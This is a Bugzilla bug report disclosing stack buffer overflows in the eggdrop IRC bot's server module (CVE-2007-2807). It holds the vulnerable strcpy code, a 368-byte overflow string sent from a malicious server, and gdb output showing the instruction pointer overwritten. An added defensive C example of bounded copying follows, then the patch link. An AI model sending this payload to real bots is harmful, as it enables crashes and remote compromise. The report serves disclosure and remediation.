Bugzilla – Bug 462
multiple buffer overflows in server module
Last modified: 2008-11-01 01:12:50
This email was sent to bugs@ several days ago; I thought it was worth posting here. I searched and didn't see where anyone else had reported it (surprisingly). Here goes:

I was taking a quick look at some of the code behind the eggie server module and I ran across a few stack-based overflows. I am incredibly surprised that no one has reported these yet. It seems that you are relying on the fact that the server the bot is connected to is sane and not malicious, but I was able to exploit these flaws by opening a netcat listener and connecting the bot to it, then sending whatever string I needed to. For example:

    static int gotmsg(char *from, char *msg)
    {
      char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp, *p, *p1, *code;
      .......
      ignoring = match_ignore(from);
      to = newsplit(&msg);
      fixcolon(msg);
      /* Only check if flood-ctcp is active */
      strcpy(uhost, from);

By sending the following string:

    :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test

(that's 368 bytes)

gdb output:

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to process 14990]
    0x42424242 in ?? ()
    (gdb) i r $eip
    eip            0x42424242       0x42424242

You overwrite the instruction pointer with 0x42424242. It should be obvious that this could allow remote code execution as well. I didn't spend too much time looking at the rest of the code; this just happened to catch my eye while I was glancing over it. I did notice a few others that were along the same lines as this, but I didn't test them or document them, although I would be happy to do so if you want more information.
Given the fact that you have to convince someone to connect to a malicious server, this isn't -THAT- serious, but if someone had the proper console permissions or was able to coerce someone to connect their eggdrop to a malicious server, then it could result in a compromise.
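The defect above is an unbounded strcpy() of the server-supplied prefix into buf[UHOSTLEN]. The following is an added example, not eggdrop's code or the patch linked below: a bounded counterpart of that copy that drops a message whose prefix would not fit, driven by a constructed benign prefix and a constructed 368-byte prefix like the one in the report. UHOSTLEN's value and the newsplit() behaviour are assumptions made here for illustration.

```c
/* Added example (not eggdrop's code). UHOSTLEN is an assumed value. */
#include <stdio.h>
#include <string.h>

#define UHOSTLEN 160          /* assumed for illustration */

/* Copy a NUL-terminated string into a fixed buffer. Returns 0 on success,
 * -1 if it would not fit; on failure dst is left empty so a caller can
 * never act on a partially copied prefix. */
static int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (dstsize == 0) return -1;
    if (n >= dstsize) {       /* no room for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened counterpart of gotmsg(): an overlong prefix is rejected instead
 * of being strcpy()'d past buf. Returns 1 if accepted, 0 if dropped.
 * `from` is the prefix after the leading ':', `msg` the rest of the line;
 * the first word of msg (what newsplit() returns) is written to to_out. */
static int gotmsg_hardened(const char *from, const char *msg,
                           char *to_out, size_t to_size)
{
    char buf[UHOSTLEN];
    if (copy_bounded(buf, sizeof buf, from) != 0)
        return 0;             /* hostile or malformed prefix: drop it */
    const char *sp = strchr(msg, ' ');
    size_t tolen = sp ? (size_t)(sp - msg) : strlen(msg);
    if (tolen >= to_size) return 0;
    memcpy(to_out, msg, tolen);
    to_out[tolen] = '\0';
    return 1;
}

/* Constructed inputs: a sane prefix, then 364 'A' + "BBBB" (368 bytes). */
static int demo(void)
{
    char to[64], big[369];
    memset(big, 'A', 364);
    memcpy(big + 364, "BBBB", 5);
    int ok_benign  = gotmsg_hardened("nick!user@host.example",
                                     "Lamestbot :test", to, sizeof to);
    int ok_hostile = gotmsg_hardened(big, "Lamestbot :test", to, sizeof to);
    return ok_benign == 1 && ok_hostile == 0 && strcmp(to, "Lamestbot") == 0;
}
```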
http://nion.modprobe.de/01_CVE-2007-2807_servmsg.patch should fix it
CVE-2007-2807 Secunia Advisory SA25276
Fixed in version 1.6.19